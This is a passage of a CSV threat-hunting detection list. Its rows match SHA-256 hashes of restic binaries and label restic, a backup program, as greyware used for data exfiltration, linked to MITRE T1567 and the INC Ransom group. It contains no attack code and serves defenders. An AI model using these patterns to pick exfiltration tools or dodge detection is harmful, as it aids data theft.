Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e41dc72ece30584c3e9c7772ba01a9f17e4e348805521382d16299e4694ac467*",".{0,1000}e41dc72ece30584c3e9c7772ba01a9f17e4e348805521382d16299e4694ac467.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e4a6b203697794386d11faebc4da7ffe7c03262755b4ac64e0c4ae633eccdc0b*",".{0,1000}e4a6b203697794386d11faebc4da7ffe7c03262755b4ac64e0c4ae633eccdc0b.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e4e4ef54d935c9de34f40e748702f5cbec400bd36b5977a22fcf1040d6945046*",".{0,1000}e4e4ef54d935c9de34f40e748702f5cbec400bd36b5977a22fcf1040d6945046.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e60e06956a8e8cdcba7688b6cb9b9815ada2b025e87b94d717172c02b9aa6c91*",".{0,1000}e60e06956a8e8cdcba7688b6cb9b9815ada2b025e87b94d717172c02b9aa6c91.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e6139b506d55565bb81ff034a8ec03349ee6f0938c27cbe846f22853e8770b7a*",".{0,1000}e6139b506d55565bb81ff034a8ec03349ee6f0938c27cbe846f22853e8770b7a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*e63b787de388b158b538006003db536fa48dec43ad26080afe44d42d93ee2115*",".{0,1000}e63b787de388b158b538006003db536fa48dec43ad26080afe44d42d93ee2115.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e7ae22a62f42e92811bb79ed2a268d4794a640a1d61282985f5dfd1b1d583b60*",".{0,1000}e7ae22a62f42e92811bb79ed2a268d4794a640a1d61282985f5dfd1b1d583b60.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e7c7c93448d7780b741496d34b10423f266ba09a8ebf1093b6d186e1f4c9e60a*",".{0,1000}e7c7c93448d7780b741496d34b10423f266ba09a8ebf1093b6d186e1f4c9e60a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e82bcb39e340b7dccdfbf649ffcbef1f7ca0d90e0d217e29bb67a95dc1cdab24*",".{0,1000}e82bcb39e340b7dccdfbf649ffcbef1f7ca0d90e0d217e29bb67a95dc1cdab24.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e8c7827dae5c757ddfdd23ef8c97c24315a9c06dcecdde7ceb45dd21145d7a2a*",".{0,1000}e8c7827dae5c757ddfdd23ef8c97c24315a9c06dcecdde7ceb45dd21145d7a2a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e8ea6411a9baa77588224ebbe6ebf21517cfeaf9b1933eef19246f955beaab4c*",".{0,1000}e8ea6411a9baa77588224ebbe6ebf21517cfeaf9b1933eef19246f955beaab4c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*e94efe0f4337a2d8d91bf3933d6bd71fc6671fe5045d65d977448b3f2c7747ec*",".{0,1000}e94efe0f4337a2d8d91bf3933d6bd71fc6671fe5045d65d977448b3f2c7747ec.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*eaaad7b12438c24759b68cd6b0652598125e8a34d1d83c581191418822b6f851*",".{0,1000}eaaad7b12438c24759b68cd6b0652598125e8a34d1d83c581191418822b6f851.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*eb8b75bf891ae654791aba1d7ac98f4f528d1f44cdf3f63604a4de92b309e5a1*",".{0,1000}eb8b75bf891ae654791aba1d7ac98f4f528d1f44cdf3f63604a4de92b309e5a1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*ec2e688f44920bed00a0bb87ec28be0d40dc7ebdfd20efdd4734afcc7b132207*",".{0,1000}ec2e688f44920bed00a0bb87ec28be0d40dc7ebdfd20efdd4734afcc7b132207.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*ec5dcf71ec36103aaae9227bfc4090d5ce3c9e07a184a2150674c7b70f0d63d6*",".{0,1000}ec5dcf71ec36103aaae9227bfc4090d5ce3c9e07a184a2150674c7b70f0d63d6.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*ec72c50bdd6b49a4a045ee92e471c01596640426aa4f5cdfdce2c2a975a2913d*",".{0,1000}ec72c50bdd6b49a4a045ee92e471c01596640426aa4f5cdfdce2c2a975a2913d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*ece898dc29881a952b5e8cbaccc17dc1fa546d61910be9cb8be05049af64ed78*",".{0,1000}ece898dc29881a952b5e8cbaccc17dc1fa546d61910be9cb8be05049af64ed78.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*ecf5f36c4567104dff7f7fc83958a2d03fce1920ab7cd37fc109d10db75620c5*",".{0,1000}ecf5f36c4567104dff7f7fc83958a2d03fce1920ab7cd37fc109d10db75620c5.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*ee3caa7a4881716651aa159df73e817c7a7d3fcf82a234d83d3f78d4070975e9*",".{0,1000}ee3caa7a4881716651aa159df73e817c7a7d3fcf82a234d83d3f78d4070975e9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*ef7bd67653ef87e73212d92560a12c430fda7f73b86d9eb9865123c44f2dfbfe*",".{0,1000}ef7bd67653ef87e73212d92560a12c430fda7f73b86d9eb9865123c44f2dfbfe.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*efa3e8453d29c9a5c581f0ff42a6aab237ccda2ba1b545d013ba1a2adaa4348e*",".{0,1000}efa3e8453d29c9a5c581f0ff42a6aab237ccda2ba1b545d013ba1a2adaa4348e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*efdd75eb5c12af6fec4189aa57dc777035a87dd57204daa52293901199569157*",".{0,1000}efdd75eb5c12af6fec4189aa57dc777035a87dd57204daa52293901199569157.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*efed00b9707b548838bb7010f9d42b41d8e2e4eedc6a2c3c3487f4e96d7439a1*",".{0,1000}efed00b9707b548838bb7010f9d42b41d8e2e4eedc6a2c3c3487f4e96d7439a1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*f0078e7c09aa38b301ec1b1679ec97bc711a178da3ca48c9354c08b33933165c*",".{0,1000}f0078e7c09aa38b301ec1b1679ec97bc711a178da3ca48c9354c08b33933165c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*f0474b15500edb41cb2eb6c7091bf96c0fe3ec455b8c0559974fcf1a3b1668e2*",".{0,1000}f0474b15500edb41cb2eb6c7091bf96c0fe3ec455b8c0559974fcf1a3b1668e2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*f05d3115ca5636a3a30f454f62c51746473121d40b9624dd28d84589b8e2eaf2*",".{0,1000}f05d3115ca5636a3a30f454f62c51746473121d40b9624dd28d84589b8e2eaf2.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*f1a9c39d396d1217c05584284352f4a3bef008be5d06ce1b81a6cf88f6f3a7b1*",".{0,1000}f1a9c39d396d1217c05584284352f4a3bef008be5d06ce1b81a6cf88f6f3a7b1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*f1fd018de5da0ba61e095a731ec6e142c9cde50f6231eabb475a889fe5f323d4*",".{0,1000}f1fd018de5da0ba61e095a731ec6e142c9cde50f6231eabb475a889fe5f323d4.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*f1ff71f1b4751329a9957412758931f8b13a9477dcff3435ee3b9ba98a6ace73*",".{0,1000}f1ff71f1b4751329a9957412758931f8b13a9477dcff3435ee3b9ba98a6ace73.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*f27c3b271ad36896e22e411dea4c1c14d5ec75a232538c62099771ab7472765a*",".{0,1000}f27c3b271ad36896e22e411dea4c1c14d5ec75a232538c62099771ab7472765a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*f2b2bb7385ee56d98659c4a0dbf42eca46227e10f92183a92934f4d96d523501*",".{0,1000}f2b2bb7385ee56d98659c4a0dbf42eca46227e10f92183a92934f4d96d523501.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*f3c09c7cc731000a762f816214dcbe8936eb470992d8c04c1439d436c09f26ac*",".{0,1000}f3c09c7cc731000a762f816214dcbe8936eb470992d8c04c1439d436c09f26ac.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*f406a3f05847268c14ec391457680b2fc6372d5e506c153de5dabe8268751480*",".{0,1000}f406a3f05847268c14ec391457680b2fc6372d5e506c153de5dabe8268751480.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*f430a8069d7fac26e93994f8d89419e5285acbc0fb4514c89f427a070614af2e*",".{0,1000}f430a8069d7fac26e93994f8d89419e5285acbc0fb4514c89f427a070614af2e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*f467c57b696a4f23fb1655091ee0af941318960d53fb94bacc4e9162585f4a0e*",".{0,1000}f467c57b696a4f23fb1655091ee0af941318960d53fb94bacc4e9162585f4a0e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*f522b356e994e001db129e2dc3f813d23b09327c623a567593cbe9dd4e130ac1*",".{0,1000}f522b356e994e001db129e2dc3f813d23b09327c623a567593cbe9dd4e130ac1.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*f559e774c91f1201ffddba74d5758dec8342ad2b50a3bcd735ccb0c88839045c*",".{0,1000}f559e774c91f1201ffddba74d5758dec8342ad2b50a3bcd735ccb0c88839045c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*f66e099b3dfc1bfa8fbbcbc04eaae20961e1b27fbb3994305d3dc7251a88da69*",".{0,1000}f66e099b3dfc1bfa8fbbcbc04eaae20961e1b27fbb3994305d3dc7251a88da69.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*f6c0fbaa3c9181db206d10a474c7c977ce274cf8ff7f7b170e5651a00d283c68*",".{0,1000}f6c0fbaa3c9181db206d10a474c7c977ce274cf8ff7f7b170e5651a00d283c68.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*f6e25c33ec23c5d6864468e4839076fa3f6613f67763f054df545a2fbf58828e*",".{0,1000}f6e25c33ec23c5d6864468e4839076fa3f6613f67763f054df545a2fbf58828e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*f7f76812fa26ca390029216d1378e5504f18ba5dde790878dfaa84afef29bda7*",".{0,1000}f7f76812fa26ca390029216d1378e5504f18ba5dde790878dfaa84afef29bda7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*f800aa3832f7f6026d8bcb866ffd08a791ff0fee061520a9759549a0ea63d0e0*",".{0,1000}f800aa3832f7f6026d8bcb866ffd08a791ff0fee061520a9759549a0ea63d0e0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*f818778b135d3b0ca9710992e13b7e06458fcde3aa914b60907aeca7ac84bb5e*",".{0,1000}f818778b135d3b0ca9710992e13b7e06458fcde3aa914b60907aeca7ac84bb5e.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*f8f06d08c202c37b3d6ba70e0ad208e64d8673fbf6031e850dfc6d673cce6e44*",".{0,1000}f8f06d08c202c37b3d6ba70e0ad208e64d8673fbf6031e850dfc6d673cce6e44.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*f9ad4d91c181da2968ccdecb5238bf872f824fe1e40253f3347c4025192f19c9*",".{0,1000}f9ad4d91c181da2968ccdecb5238bf872f824fe1e40253f3347c4025192f19c9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*fa038acf7cd53cad4e1e6aef7d73a7a2c4eafff9fd344db05ff725884166e58c*",".{0,1000}fa038acf7cd53cad4e1e6aef7d73a7a2c4eafff9fd344db05ff725884166e58c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*faa846645677d0e4da5812851326f4f18b7310d53edd380ed93165099395e4c7*",".{0,1000}faa846645677d0e4da5812851326f4f18b7310d53edd380ed93165099395e4c7.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*fbaf3740b294ecd0cebcae3e5c7005b6fc9897357b8ee050a30c01cccd3b2019*",".{0,1000}fbaf3740b294ecd0cebcae3e5c7005b6fc9897357b8ee050a30c01cccd3b2019.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*fbb5435d1881e4a8df856378bbfa5b83bcb21ec9163a0690c63b88a83274729a*",".{0,1000}fbb5435d1881e4a8df856378bbfa5b83bcb21ec9163a0690c63b88a83274729a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*fca1c44409a39abbd36c9326a96a8470022e5e48d436b6c57fa4b2735d69405c*",".{0,1000}fca1c44409a39abbd36c9326a96a8470022e5e48d436b6c57fa4b2735d69405c.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*fca3229e1f47db94e4707350c7b8fff9cb0e27d61d130477ad0ea3dd3808da67*",".{0,1000}fca3229e1f47db94e4707350c7b8fff9cb0e27d61d130477ad0ea3dd3808da67.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*fcb302a952c8b928788cabbefc0e8393eed884ec306f9d0ea9b3c109b8f31f40*",".{0,1000}fcb302a952c8b928788cabbefc0e8393eed884ec306f9d0ea9b3c109b8f31f40.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data 
Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*fcb8cfece92e787dc07616f7942b8632e74c24bafe6de1d0245543b9c7010a76*",".{0,1000}fcb8cfece92e787dc07616f7942b8632e74c24bafe6de1d0245543b9c7010a76.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*fce382fdcdac0158a35daa640766d5e8a6e7b342ae2b0b84f2aacdff13990c52*",".{0,1000}fce382fdcdac0158a35daa640766d5e8a6e7b342ae2b0b84f2aacdff13990c52.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*fd0df9fb27d39a7990ecb66d872798148d6954207d653510035e087e1b6218a9*",".{0,1000}fd0df9fb27d39a7990ecb66d872798148d6954207d653510035e087e1b6218a9.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*fd36ecab09eb04dab2aadae09347fcb19ba8d020d1684d4a096402e0aed15655*",".{0,1000}fd36ecab09eb04dab2aadae09347fcb19ba8d020d1684d4a096402e0aed15655.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" 
"*fd900c4347ee081a5dcd7bd1d33cb748621f72793fdc63becb9b0410a14df494*",".{0,1000}fd900c4347ee081a5dcd7bd1d33cb748621f72793fdc63becb9b0410a14df494.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*fda4d4aa167c0baa4ef5159613f090dcc61b265108cc93c98c9bfdcbd6a486a0*",".{0,1000}fda4d4aa167c0baa4ef5159613f090dcc61b265108cc93c98c9bfdcbd6a486a0.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*fdee8d4b32f8da73f39a0ee525a90343b663edc671c520d97e1540b41531be32*",".{0,1000}fdee8d4b32f8da73f39a0ee525a90343b663edc671c520d97e1540b41531be32.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*fe0c598004e2f3453bcd75e0d3ea77372289cf17302f162089b3c544a54d2216*",".{0,1000}fe0c598004e2f3453bcd75e0d3ea77372289cf17302f162089b3c544a54d2216.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*fe3115fada63d6efd85cb0e3f7a9c52e688004334eef6c0d7349c39b64e9470d*",".{0,1000}fe3115fada63d6efd85cb0e3f7a9c52e688004334eef6c0d7349c39b64e9470d.{0,1000}","greyware_tool_keyword","restic","backup program used by threat 
actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*fec7ade9f12c30bd6323568dbb0f81a3f98a3c86acc8161590235c0f18194022*",".{0,1000}fec7ade9f12c30bd6323568dbb0f81a3f98a3c86acc8161590235c0f18194022.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - TA0010","N/A","INC Ransom","Data Exfiltration","https://github.com/restic/restic","1","0","#filehash","N/A","8","10","25600","1528","2024-08-30T11:52:37Z","2014-04-27T14:07:58Z" "*ff1a32145246a5c3e38142aa015cfbcd5dc046674d0a3f16979ff6c4eb1cfe6a*",".{0,1000}ff1a32145246a5c3e38142aa015cfbcd5dc046674d0a3f16979ff6c4eb1cfe6a.{0,1000}","greyware_tool_keyword","restic","backup program used by threat actors for data exfiltration","T1567","TA0009 - 